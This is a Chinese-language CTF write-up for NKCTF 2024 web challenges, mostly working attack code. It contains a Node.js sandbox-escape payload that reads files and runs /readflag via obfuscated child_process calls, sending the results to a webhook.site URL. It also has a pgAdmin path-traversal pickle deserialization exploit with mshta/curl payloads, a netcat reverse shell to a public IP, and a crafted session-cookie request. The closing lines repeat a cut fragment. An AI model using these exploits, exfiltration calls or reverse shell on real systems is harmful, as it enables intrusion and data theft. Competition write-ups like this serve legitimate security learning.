NKCTF 2024
web
my first cms
爆破密码进去直接命令执行得到flag
参考链接
https://github.com/capture0x/CMSMadeSimple2
https://github.com/capture0x/CMSMadeSimple
全世界最简单的CTF
使用nodejs的fs模块可以读取文件,我猜测文件位置是app/app.js查看到源码
然后使用语句
throw new Proxy({}, {
get: function() {
const cc = arguments.callee.caller;
const gg = (cc.constructor.constructor(`return ${`${'proces'}s`}`))();
const fs = gg.mainModule.require('fs').readFileSync('/app/app.js');
const p = (cc.constructor.constructor('return fetch'))();
return p("https://webhook.site/8asd9-3eb1-4b42-adef-09fc03f43cca", {method: "POST", body: JSON.stringify({data: `${fs}`})});
}
})
即可读取到app/app.js
他源码并没有过滤掉fork我们正好可以利用
最终脚本
// 文件写入suceess
throw new Proxy({}, {
get: function() {
const cc = arguments.callee.caller;
const gg = (cc.constructor.constructor(`return ${`${'proces'}s`}`))();
let content = `
let cs = require('${`${'child_p'}rocess').exe`}cSync('/readflag').toString();
${`${'proces'}s`}.on("message",function(msg){
fetch("https://webhook.site/8asd9-3eb1-4b42-adef-09fc03f43cca", {method: "POST", body: JSON.stringify({data: cs})});
})
`;
const fs = gg.mainModule.require('fs').appendFileSync("./readflag1.js",content);
const p = (cc.constructor.constructor('return fetch'))();
return p("https://webhook.site/8asd9-3eb1-4b42-adef-09fc03f43cca", {method: "POST", body: JSON.stringify({data: `${fs}`})});
}
})
//通信成功
throw new Proxy({}, {
get: function() {
const cc = arguments.callee.caller;
const g = (cc.constructor.constructor(`return ${`${'proces'}s`}`))();
const h = g.mainModule.require(`${'child_p'}rocess`).fork('./readflag1.js');
h.send('hello');
const p = (cc.constructor.constructor('return fetch'))();
return p("https://webhook.site/8asd9-3eb1-4b42-adef-09fc03f43cca", {method: "POST", body: JSON.stringify({data: `${h}`})});
}
})
注意过滤即可
attack_tacooooo
参考链接
https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/
脚本如下
import struct
import sys
def produce_pickle_bytes(platform, cmd):
b = b'\x80\x04\x95'
b += struct.pack('L', 22 + len(platform) + len(cmd))
b += b'\x8c' + struct.pack('b', len(platform)) + platform.encode()
b += b'\x94\x8c\x06system\x94\x93\x94'
b += b'\x8c' + struct.pack('b', len(cmd)) + cmd.encode()
b += b'\x94\x85\x94R\x94.'
print(b)
return b
if __name__ == '__main__':
if len(sys.argv) != 2:
exit(f"usage: {sys.argv[0]} ip:port")
with open('nt.pickle', 'wb') as f:
f.write(produce_pickle_bytes('nt', f"mshta.exe http://{HOST}/"))
with open('posix.pickle', 'wb') as f:
f.write(produce_pickle_bytes('posix', f"curl http://{HOST}/"))
还有一个smbserver.py
首先要知道这个漏洞是因为join去合并拼接产生
此函数有两个缺点:
它没有设置不应转义的受信任基路径,因此返回 。os.path.join("/opt/safe/", "../../etc/passwd")/etc/passwd
它在其参数中使用最右边的绝对路径作为根路径,因此返回 。os.path.join("./safe/", "do_not_escape_from_here", "/etc/passwd")/etc/passwd
比赛题目环境是由docker容器搭建
环境内无curl以及bash
但是有nc可以利用nc来达到反弹shell
nc 8.137.131.159 9006 -e sh
并且下面是需要利用
pga4_session来构造反序列化
GET /browser/ HTTP/1.1
Host: 7d4eaaa6-c6d5-487e-a1d4-65986d6adb85.node.nkctf.yuzhian.com.cn
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://7d4eaaa6-c6d5-487e-a1d4-65986d6adb85.node.nkctf.yuzhian.com.cn/login?next=%2F
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: pga4_session=../storage/tacooooo_qq.com/posix.pickle!baeac19e-2dcc-4d96-a4c7-1ff410ddd8c2!AZleysLS+ZnrL20IU1mGt6lHxXc3O8/It0JHyC4sJqA=; PGADMIN_LANGUAGE=en
Connection: close
构造如上,路径无所谓
公网ip监听端口即可
c19e-2dcc-4d96-a4c7-1ff410ddd8c2!AZleysLS+ZnrL20IU1mGt6lHxXc3O8/It0JHyC4sJqA=; PGADMIN_LANGUAGE=en
Connection: close
构造如上,路径无所谓
公网ip监听端口即可